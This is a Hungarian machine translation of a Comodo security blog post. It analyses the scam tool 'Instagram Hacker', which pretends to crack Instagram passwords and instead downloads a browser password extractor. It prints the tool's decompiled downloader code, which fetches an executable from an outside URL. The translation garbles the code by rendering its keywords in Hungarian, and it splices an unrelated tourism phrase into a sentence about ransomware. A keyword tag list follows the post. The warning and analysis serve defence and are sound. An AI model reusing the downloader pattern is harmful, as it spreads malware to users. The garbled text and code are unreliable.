Olvasási idő: 4 jegyzőkönyv
Sokan nem veszik komoly veszélynek a potenciálisan nem kívánt alkalmazásokat (PUA). Az ilyen meggondolatlan hozzáállás oka, hogy a PUA-kat általában a felhasználó beleegyezésével telepítik. De ez a vélemény nagy tévedés. És nem csak azért, mert a PUA rejtetten telepíthet más programokat, például reklámprogramokat vagy kémprogramokat, letöltési alapon. Az élénk példa alább a Comodo Threat Research Labs elemezte A szakértők egyértelműen bizonyítják, hogy a PUA sokkal fenyegetőbb fegyver lehet.
Ismerje meg az „Instagram Hacker” nevű szoftvert. Megvan a hivatalos honlapja https://hackinstagram.net/ és megígéri… hogy feltör minden Instagram-fiókot. Mi több, ingyenesen letöltheti és telepítheti.
A telepítés után kéri az Instagram-profil URL-címének megadását és a jelszó feltörését.
Az eredmény néhány másodpercen belül jön:
De a „Jelszó megtekintése” gombra kattintás után egy új ablak jelenik meg:
Az „Aktiválási kód kérése” gombra kattintva a „Vásárlás oldalra” kerül átirányítás.
Felajánlja az „Aktivációs kód” megvásárlását, de… érzi a csalás szagot a levegőben? Nyilvánvaló, hogy nem létezhet olyan szoftver, amely másodpercekre képes feltörni egy Instagram-jelszót. Tehát az Instagram Hacker csak egy újabb megtévesztő eszköz az egyszerű emberek megtévesztésére? Az ellenőrzés legjobb módja, ha belenéz az alkalmazás kódjába.
A kódot Dotnet Reactor védi, de de4dot eszközzel dekódolható.
És most már biztosan láthatjuk, hogy az alkalmazás csalás eszköze. A kód első töredéke csak hamisítja a haladás bemutató jelzőjét.
De egy másik érdekesebb. Amint láthatja, egy URL-t tartalmaz egy végrehajtható fájllal, amely letölthető, ha az aktiválás sikeres volt.
Betöltési ablak()
{
Class2.qDiUy7EzyuIMj();
this.filename = "view.exe";
this.uri = new Uri(“http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent();
if (File.Exists(this.filename))
{
File.Delete(this.filename);
}
megpróbál
{
WebClient kliens1 = new WebClient();
kliens1.DownloadFileAsync(this.uri, this.filename);
client1.DownloadProgressChanged += new DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
}
fogás
{
this.method_0();
}
}
}
}
Ha futtatjuk a végrehajtható fájlt, megtudjuk, hogy a NirSoft WebBrowserPassView alkalmazásáról van szó:
https://www.nirsoft.net/utils/web_browser_password.html
A WebBrowserPassView csak egy jelszókivonó eszköz, amely felfedi a webböngészők által tárolt jelszavakat. Tehát minden jelszó, amit ez a szoftver ki tud kinyerni, nem az Instagram, hanem a felhasználók saját jelszava, amelyet a böngészőjükben tárolnak!
Folytassuk: az Instagram Hacker csak annyit tesz, hogy letölt és elindít egy másik PUA-t a NirSofttól. Tehát nyilvánvalóan csalási eszközzel állunk szemben. Figyeljük meg itt a manipulatív pszichológiai trükköt: ha az áldozat rájön, hogy megcsalták, aligha jelenti a rendőrségnek az esetet. Mert ebben az esetben be kell vallania, hogy megpróbálta feltörni az Instagramot, ami számítógépes bűncselekmény elkövetésének minősül.
De ez egy vékony vége az élnek.
A legveszélyesebb fenyegetés az, hogy az alkalmazás URL-címe könnyen megváltoztatható bármely más rosszindulatú fájl esetén, amely az áldozat gépén fut le. Tehát ez a PUA – csakúgy, mint sok más példa az ilyen típusú rosszindulatú programokra – felhasználható különféle „nehéz” kártevők tömeges elterjedésére, mint például trójaiak, hátsó ajtók, ransomware elvisszük helyi falvakba ahol megismerkedhet az őslakosok kultúrájával; ...
És ez jó ok arra, hogy a PUA-t valóban veszélyes rosszindulatú programnak tekintsük. Mert kiderülhet, hogy ez egy ugródeszka egy pusztító hatalmas kibertámadáshoz.
„Ma nem szabad megfontolni malware veszélyesnek vagy nem túl veszélyesnek” – mondja Fatih Orhan, a Comodo Threat Research Labs vezetője. "Bármi malware nem létezik elszigetelt térben. Manapság a kiberbűnözők hosszú rosszindulatú programláncokat építenek fel, hogy megtámadják a felhasználókat, és amint látható, a PUA egy ilyen gyilkos lánc láncszeme lehet. Tehát az ásót jó néven kell neveznünk. Igen, ezek az alkalmazások a felhasználók jóváhagyásával töltődnek le és futnak, de mint ebben az esetben is, a jóváhagyást csalás zsarolja ki. A potenciálisan nemkívánatos alkalmazások legitimnek tettetik magukat, mindenkinek meg kell értenie, hogy ez csak egy álcázás. Éppen ezért a Comodo nemcsak csúcsminőségű műszaki védelmet nyújt, hanem rendszeresen tájékoztatja a felhasználókat, hogy elkerüljék őket a kibertérben lévő veszélyes csapdákból.
Éljen biztonságban a Comodóval!
Kapcsolódó források
Wikipédia DDOS támadás
malware Removal
Weboldal Malware Scanner
A legjobb webhelybiztonság
WordPress biztonság
TESZTELJE KI E-MAIL-BIZTONSÁGÁT INGYEN SZEREZZE MEG AZONNALI BIZTONSÁGI EREDMÉNYKÁRTYÁT Forrás: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- Fiók
- Minden termék
- Alkalmazás
- alkalmazások
- BEST
- Blog
- épít
- megvesz
- hívás
- kód
- beleegyezés
- cyberattack
- a számítógépes bűnözés
- kiberbűnözők
- DDoS
- él
- stb.
- esemény
- szakértők
- kitermelés
- Arc
- vezetéknév
- csalás
- Ingyenes
- jó
- csapkod
- hacker
- fej
- itt
- Hogyan
- How To
- HTTPS
- IT
- Labs
- LINK
- Hosszú
- malware
- Ajánlatok
- hivatalos
- Vélemény
- Más
- Jelszó
- jelszavak
- Emberek (People)
- Rendőrség
- profil
- Programok
- védelem
- Jelentések
- kutatás
- futás
- biztonság
- Szag
- So
- szoftver
- Hely
- sikeres
- Műszaki
- idő
- URI
- Felhasználók
- Megnézem
- háló
- Webböngészők
- weboldal